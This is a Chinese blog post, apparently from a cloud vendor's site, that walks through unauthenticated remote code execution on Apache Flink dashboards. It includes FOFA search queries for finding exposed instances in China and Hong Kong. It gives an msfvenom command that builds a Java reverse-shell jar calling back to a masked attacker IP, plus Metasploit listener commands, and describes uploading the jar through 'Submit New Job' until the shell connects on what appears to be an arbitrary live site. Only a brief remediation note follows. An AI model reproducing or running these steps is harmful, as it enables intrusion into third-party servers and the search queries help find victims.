温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Apache Flink未授权访问+远程代码执行的示例分析

发布时间:2021-12-31 10:51:39 来源:亿速云 阅读:824 作者:小新 栏目:大数据

这篇文章给大家分享的是有关Apache Flink未授权访问+远程代码执行的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

 

Apache Flink 未授权访问+远程代码执行

FOFA

FOFA 语句
app="Apache-Flink" && country="CN"
app="Apache-Flink" && country="CN" && region="HK"
 
Apache Flink未授权访问+远程代码执行的示例分析  
  • 国内还是很多使用 Apache Flink 的,大概有1K+的数量左右
 

漏洞复现


1、这里随便搞个站打开进行复现,打开以后就长这样子。

Apache Flink未授权访问+远程代码执行的示例分析  

点击Submit New Job翻译:文件上传 2、打开MSF 生成一个 jar 木马

msfvenom -p java/meterpreter/reverse_tcp LHOST=**.***.59.61  LPORT=4444 -f jar > testone.jar
 
Apache Flink未授权访问+远程代码执行的示例分析  

3、点击 Add 上传 jar 文件

Apache Flink未授权访问+远程代码执行的示例分析  

4、设置监听端口

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp 
payload => java/shell/reverse_tcp
msf5 exploit(multi/handler) > set lhost XX.XXX.XX.61
lhost => XX.XXX.XX.61
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run
 
Apache Flink未授权访问+远程代码执行的示例分析  

5、点击下 submit

Apache Flink未授权访问+远程代码执行的示例分析  

6、反弹shell成功

Apache Flink未授权访问+远程代码执行的示例分析  
 

修复建议

建议用户关注Apache Flink官网,及时获取该漏洞最新补丁。临时解决建议 设置IP白名单只允许信任的IP访问控制台并添加访问认证。

感谢各位的阅读!关于“Apache Flink未授权访问+远程代码执行的示例分析”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI